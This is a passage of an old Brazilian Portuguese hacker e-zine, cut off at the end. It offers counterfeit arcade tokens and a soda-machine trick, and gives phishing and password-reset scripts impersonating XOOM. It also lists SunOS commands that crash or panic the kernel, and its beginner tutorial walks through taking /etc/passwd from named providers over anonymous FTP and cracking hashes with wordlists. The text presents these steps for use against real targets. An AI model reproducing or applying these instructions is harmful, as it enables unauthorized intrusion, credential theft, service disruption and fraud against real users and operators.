-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	A partir da 07 começei a usar este tipo de indice por isso só irei
publicar o total das notas.

Edição:		Total:

07.		9,0
08.		9,1
09.		9,0
10.		9,3
11.		9,4
12.		9,5
13.		9,6
14.		9,5
15.             9,7

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Grafico de notas
__________________________________________
10,0|                                     |
9,7 |                                     |_____9,7 - Escala maxima
9,6 |                             ___    /|           (ultima edicao)
9,5 |                            // \\  //|
9,4 |                           //   \\// |
9,3 |                          //         |
9,1 |                   ___   //          |
9,0 |              ____// \\_//           |
8,8 |         ____//                      |
8,6 |  ___   //                           |
8,5 | // \\_//                            |
7,5 |//___________________________________|_____7,5 - Escala minima
____|0|1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|           (primeira edicao)

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Quem já escreveu na CSZine???

* Cheat Struck (todas edições)
* The Mentor (01)
* Ton Waits (01, 02)
* saqueadores (05)
* Markus Hübner (06, 07, 08)
* rEPTILE0 (06, 07)
* ^DarkLord^ (10)
* AliBaBa (12, 13, 14)
* Simon Phoenix (14, 15)

	Quer seu nick nessa lista?? Escreva uma materia que se encaixe nas
seçòes da zine e mail-me.

-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$            $$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  7. Vivendo  $$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$            $$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Jogando fliperama de graca 1 (ficha)

	Corte uma vela grossa em pequenas rodelas parecidas com a ficha.
	Amasse bem umas tampinhas de garrafa para que fiquem muito finas, e
entao coloque as laminas metalicas dentro das da vela.
	Nao esqueca de dar o formato das entradas moldados na cera entao
deixe elas no refrigerador por umas 5 horas ate ficar bem duras.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Jogando fliperama de graça 2 (cartão)

	Em muitos lugares você encontra manhas como essa, não garanto que
funcione pois eu não vou gastar 1 real no cartão para depois se não funcionar
ter que joga-lo fora(pq a velha do caixa vai nota).
	É só pegar o cartão e passar esmalte incolor naquela fita preta. É
melhor que passe esmalte com spray, pois com o pincel pode apagar um pouco a
fita.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-==-=-=-=-=-=-=-=-=-=-=-

	Refri de graça

	Você pode fazer fichas como diz na primeira materia dessa seção e
depois que colocar a ficha, aperte dois botões da maquina de refri, tipo.. O
botão de guarana e de spryte juntos.
	Um amigo meu disse que era pá apertar em sequencia sabe.. guarana,
spryte, guarana, spryte, guarana, spryte, ...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Não ser multado por pardais

	Também nào sei se funcionará..
	Coloque um espelho ou um CD em cima da placa do seu carro, Quando o
pardal der o flash para tirar a foto o luz fará reflexo e não vai dá pra vê
nada.
	Isso é meio mentira, pois o raio de luz não sai para uma só direção
e sim para varias. É até capaz do reflexo voltar direto na camera mas não
garanto que vai funcionar sempre.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$
$$$$$$$                           $$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$
$$$$$$  8. Invasão de privacidade  $#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$
$$$$$$$                           $$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Engenharia Social

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	É um dos meios mais usados para adquirir senhas de home pages gratui-
tas, porém a maioria dos servidores gratuitos estão advertindo seus usuarios
e seus administradores. Tipo.. Não funcionara em servidores como hotmail,
geocities e xoom.
	Mesmo assim você pode enganar o próprio dono da page. Só que se ele
descobrir que é enganação, pode sobrar pra tí.
	Os dois modos são arriscados pois seu e-mail estará em jogo, mas quem
disse que essa vida de hacker é molesa??

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=

	Enganando os admins do server

	Primeiro visite a pagina.
	Anote o username do kra tipo:

http://www.server.com/babaca
                      ^^^^^^---username.

	Verifique tb se não existe um link que mande e-mail para o kra. Aten-
ção!! Se por acaso só existir o e-mail do próprio server, ignore-o.
	Ae mande um e-mail para o servidor dizendo o seguinte:

"Ola pessoal
 Eu não me lembro de minha senha
 Meu username é ******
 Meu antigo email era *****@***.com, porfavor mande para seu@email.
 Obrigado"

	Mas já que não existe servidores gratuitos aqui no Brasil(se existe
me avise) vc terá que mandar o e-mail em inglês. Se você não sabe inglês o
suficiente para traduzir isso, aqui vai um e-mail que eu mandei e funcionou.
	Quem eu hackei?? Um amigo meu que tava se achando o bom por ter
colocado sua page na xoom. Porém a pouco tempo eu tentei de novo e não deu.

"Hello XOOM
 I don't remenber my password
 My username is ********
 My old email as ****@***.com, please send to cszine@hotmail.com .
 Tanks!"

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Enganando os donos da page

	Faça um cadastro no mesmo servidor e use um login tipo XOOM32(tomando
como exemplo a xoom. Ae seu novo email será xoom32@xoommail.com(convicente
naum??).
	Mande um mail pro usuario dizendo que se ele preencher o formulario
ganhara 10MB a mais na sua page, ou que é um sistema novo de segurança e os
usuarios que não responderem terão suas contas deletadas.
	Ex:

" More 10Mb free in XOOM!!!
  Please, Complete the formularium:

  REAL NAME: __________________________________________________________
  AGE : _______   SEX : ________  LAST ATUALIZATION : _________________
  COUNTRY  : ______________   CITY : ________________ STATE : _________
  ADDRESS  : __________________________________________________________
  USER NAME: __________________________________________________________
  PASSWORD : __________________________________________________________
  EMAIL : _____________________________________________________________
  OTHER HOMEPAGE : ____________________________________________________

  Reply on complete.
  Tanks for your time.
  XOOM."

	Ou faça uma coisa mais original, vc quem sabe.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$         $$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  9. Bugz  $$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$         $$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Corrigindo A edição passada. Na seção "hack, the art" foi mostrado
um bug do identd no mIRC 5.3 . Na realidade não é o servidor todo que é blo-
queado e sim seus usuarios que usam o essa versão do mIRC.
	Você precisa dar 6 telnets na porta 113 do host do usuário e não do
servidor como estava dizendo.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Bugz para SunOS por Simon Phoenix

«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«
* Versão : 4.1.4 (ou abaixo)
* Descrição : Congele
* Exploit :
1) cat /dev/tcx0
2) ls /dev/tcx0/*
3) cat /dev/zero > cat /dev/keyboard

«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«
* Versão : 4.1.x
* Descrição : Crash
* Exploit :
cp -p /vmunix /dev/audioctl
rcp /etc/motd you@some.host:/dev/audio

«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«
* Versão : 4.1.4 (tmpfs)
* Descrição : panico no kernel 1
* Exploit :
cd /tmp
mknod aaa p
ln aaa bbb
$ ls -l

«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«
* Versão : 4.1.4
* Descrição : panico no kernel 2
* Exploit :
cd /tmp
mkdir a
cd a
vi b
(Escrever qquer coisa)
(muda de terminal)
rm -r /tmp/a
(muda de terminal)
(Grava o arquivo usando: w no vi)

«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«
* Versão : 4.1.4
* Descrição : panico no Mas
* Exploit :
cd /tmp
mkdir aaa
chmod -w aaa
cd aaa
ln -s bbb ccc

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$
$$$$$$$                   $$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$
$$$$$$  10. Hack, the Art  $$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$
$$$$$$$                   $$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=

        Tutorial para iniciantes

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Atenção!!! Isso é um mini-tutorial para os begginers entenderem uma
parte sobre o hacking que eu acho que não comentei no decorrer da zine.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

	Antes de começarmos temos que esclarecer umas coisas:

	Em que consiste o hacking???
	Hacking é tirar o maior proveito de um sistema alheio, e a melhor ma-
neira de se aproveitar tudo o que o sistema tem a oferecer é tornar-se o root
ou seja ter os mesmos direitos do que o próprio administrador do sistema.

	Quem é o root???
	O root é o chefão do sistema. Ele tem acesso a tudo, todos os files,
todos os diretórios, todos os usuários do sistema, ele manda em tudo. Em
outras palavras, o root é o usuário com ID = 0(o mais alto).

	Que sistema que é usado nas redes???
	O nome do sistema é UNIX, ele possui varias variações, como o Linux,
SunOS, Ultrix, HP-UX, entre outros para os diversos tipos de computadores.
Ele é usado por possuir uma segurança bem melhor do que qualquer outro siste-
ma já visto. Ao conectar-se com um sistema UNIX surgirá um pedido de Login e
password. Só é possivel conectar-se com um sistema UNIX se você tiver esses
dois dados.

	E eu também posso usar um UNIX???
	Não pode, DEVE!!! Pois é o melhor sistema para se conectar à qualquer
rede, inclusive a internet. Se você possui um computador da IBM o nome do
UNIX é Linux, se possui um HP é o HP-UX, um Sun é o SunOS... Além de ser o
melhor sistema para redes, também é o mais seguro.

	Como e' um sistema UNIX? E' parecido com o Windows???
	Não, é mais parecido com o DOS. Possui uma série de comandos próprios
e não tem um hambiente muito agradavel, tipo Windows. A principio o Unix era
um sistema operacional para programadores, por isso ele possui varios compi-
ladores para linguagens C, Assembly, FORTRAN, entre outras, além de aceitar
macros como os .BAT's do MS-DOS.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=

        Primeiros passos

	É claro que o seu primeiro passo poderia ser deletar o Windows e ins-
talar o UNIX, mas talvés você esteja passando pelos mesmos problemas que eu
quando descobri que isso existia(falta de money e informação) então se você
quer mesmo instalar o unix, arranje com algum amigo, ou compre e também baixe
tutoriais de UNIX na internet. É bem fácil de achar, é só entar num site de
busca, tipo www.cade.com.br e procurar por "tutoriais unix".
	Mas já que você provavélmente não irá parar de lêr esse texto agora
para instalar o UNIX, vamos fazer uma pequena invasão a um provedor qualquer.
	Siga os seguintes passos:

1. Já conectado a internet entre no prompt do dos e digite "ftp".
   ¡Você abriu o programa de ftp instalado junto com os protocolos TCP/IP!
2. Agora o prompt mudou para "ftp>", digite "open embramic.com.br"
   ¡Esse comando faz com que vc abra uma conexão com o servidor EasyWay!
3. Você se conectou. Digite "anonymous" como login.
4. Digite algum e-mail qualquer como password.
5. Pronto você está dentro porém como está usando login Anonimo, a sua cone-
   xão possui algumas restrições.

	Agora vamos ao nível mais técnico. É quase obrigatório lêr isso, pois
será usado no decorrer do apreendisado.
	O protocolo usado na internet é chamado TCP/IP. Ele possui uma série
de "sub"-protocolos, o que facilita nas comunicações na internet. Cada "sub"-
protocolo possui uma porta de comunicação, tipo...

HTTP(Protocolo de transferencia de hyper texto) = 	porta 80
SMTP(Protocolo de transferencia de e-mail) 	=	porta 25
FTP(Protocolo de transferencia de arquivos)	=	porta 21

	Nos utilizamos o protocolo FTP aqui, então abrimos uma conexão com o
servidor através da porta 21. Vamos aprender um pouco mais sobre o protocolo
TCP/IP, no decorrer do manual.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

        Roubando o arquivo de senhas

	Como já vimos, o sistema utilizado na maioria das redes, inclusive na
internet, é o UNIX. O nome do arquivo de senhas no unix	é "passwd" e está no
diretório "/etc".
	Vamos fazer uma pequena invasão a um servidor, usando o protocolo ftp
que já conhecemos, e roubar o seu arquivo de senhas.
	Siga os passos:

1. Entre no prompt do DOS e digite "ftp"
2. Digite "open emrede.com.br" para se conectar com o provedor EmRede.
3. Digite o login "anonymous".
4. Digite um e-mail qualquer para a senha.
5. Você está conectado. Digite "ls" para listar os arquivos e diretórios.
6. Viu o diretório "etc"? Se viu pule para o passo 9.
7. Digite "cd .." para ir pro diretório raiz do provedor.
8. Digite "ls" novamente para ver se o diretório "etc" está aí. Se não esti-
   ver volte para o passo 7.
9. Digite "cd etc" para entrar no diretório etc.
10. Digite "ls" novamente.
11. O arquivo "passwd" está aí. Para pega-lo digite "get passwd".
12. Agora disconecte-se. Digite "bye".

	Você pegou o arquivo "passwd", mas não vá pensando que já é hacker.
	Abra o arquivo "passwd". Ele está no diretório que você estava quando
digitou "ftp".
	Veja a estrutura das contas. Entendeu alguma coisa?? Então veja o ex:

	root:x:0:1:0000-Admin(0000):/:/sbin/sh
	 |   | | |      |           |    |
	 |   | | |      |           |    +---> Shell
	 |   | | |      |           |
	 |   | | |      |	    +---> Diretório root
	 |   | | |	|
	 |   | | |      +---> Comentario
	 |   | | |
	 |   | | +---> GroupID
	 |   | |
	 |   | +---> UserID
	 |   |
	 |   +---> Password
	 |
	 +---> Login

	No exemplo acima a unica coisa que nos enteresa é o login, o password
e o UserID.
	O login no caso é "root"
	O Password é "x". Não, isso não quer dizer que não tem password para
essa conta. O "x" quer dizer que o password está shadowado(BAH!). O shadow é
como uma camuflagem,  ele esconde as contas,  com UserID muito baixos,  em um
outro arquivo.
	O UserID é 0. Quer dizer que este cara é o chefão do sistema. Quanto
menor o UserID maior o poder do usuário.

	Como esse sistema está usando Shadow,  você pode descartar o arquivo
"passwd" pois esse não lhe dará merda nenhuma,  a não ser talvés,  contas de
usuários muito fracos(com alto UserID).

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

        Roubando o shadow

       A primeira coisa a se fazer é encontrar o local do Shadow. Normalmente
é no diretório "/etc/" e o nome do arquivo é "shadow",  mas isso depende do
sistema.  E mesmo assim você não teria permissão a ele pois você é apenas um
mero usuário no sistema.
        Então como eu faço??? Vc pode dar uma olhada num manual que eu escre-
vi e pode ser encontrado na minha homepage ou usar um programa(tb disponivel
na page) que rouba a shadow.
        Apos baixa-lo vc tera q envia-lo para uma shell e compila-lo.
	Execute este programa assim:

	unshad >> senhas.txt

	Depois lêia o arquivo senhas.txt, lá estarão todas as contas com suas
passwords encriptadas. Se o arquivo estiver vasio, quer dizer que o programa
nao conseguiu encontrar o arquivo de senhas.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

        Descriptando

	Existem vários programas que fazem esse trabalho.  Um dos mais conhe-
cidos é o "CrackJack".
	Para descriptar uma senha o programa utiliza várias combinações de
uma wordlist, e as encripta. Aí compara com a senha.  Se a combinação é iden-
tica, você encontrou uma senha, se é diferente, o programa pula para a outra
combinação.
	Uma wordlist é uma lista de palavras que qualquer um pode fazer. Ape-
nas crie um arquivo e coloque todas as combinações que você acha que possam
se encaixar com a senha em lista. Como no exemplo a seguir:

aaaaaa
abcdef
teste1
teste2
struck
badboy
hunter
123456

	Aqui vai uma rápida explicação de como usar os programas crackeadores
mais conhecidos para seus devidos sistemas.

	Para DOS e OS/2 você pode encontrar o "Jack14".
	Digite "jack" , coloque o nome do arquivo de senhas quando aparecer
"PWfile(s)", e o nome da wordlist quando aparecer "Wordfile".  As senhas des-
criptadas estarão no arquivo JACK.POT.

        Para DOS tb existe o "John" que e' o sucessor do Jack.
        Digite "john -w:wordlist passwd". Use a flag -beep se vc quizer com
que o DOS de um beep a cada descriptação.

	Para Windows você encontra o "Killer Crack".
	Quando aparecer "PWfile" coloque o nome do arquivo de senhas, quando
aparecer "Wordfile" digite o nome da wordlist e quando aparecer "Validfile",
digite o nome do arquivo onde estarão as senhas validas.

	Para MS-DOS você também encontra o "Brute Force".
	Este programa serve para você testar a senha de palavra em palavra.
Use assim "fbrute passwd senha",  onde o  "passwd" é o arquivo de senhas e a
"senha" é a palavra chave para ser testada.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$

        Eu jah pedi uma vez e vou pedir denovo. Porfavor me mandem emails
dizendo sobre o que acharam da zine. Nem que seja apenas para dizer que leu
pois no momento eu nao estou sabendo ao certo quantas pessoas jah leram a
minha zine no momento.
        Se voce leu e gostou, coloque na sua page para download e tambem
faca um link para a minha page. Porem se achar d+ apenas anuncie-o na sua
page please.
        Se voce tem alguma duvida sobre qualquer coisa publicada na zine e/ou
nos tutoriais escritos por mim. E' soh mandar um mail que eu nao vo sacanear.
        Se vc achou a zine podre. Tb mande email que assim eu vou saber o que
vcs estao realmente interesados em ver. E se vc ta escrevendo alguma zine
pode manda o link para a page que eu coloco na minha. Porem se ainda nao
existir pagina para a zine(como aconteceu nas primeiras edicao da CSZine) e'
soh mandar as zines por mail e eu ponho na secao de z
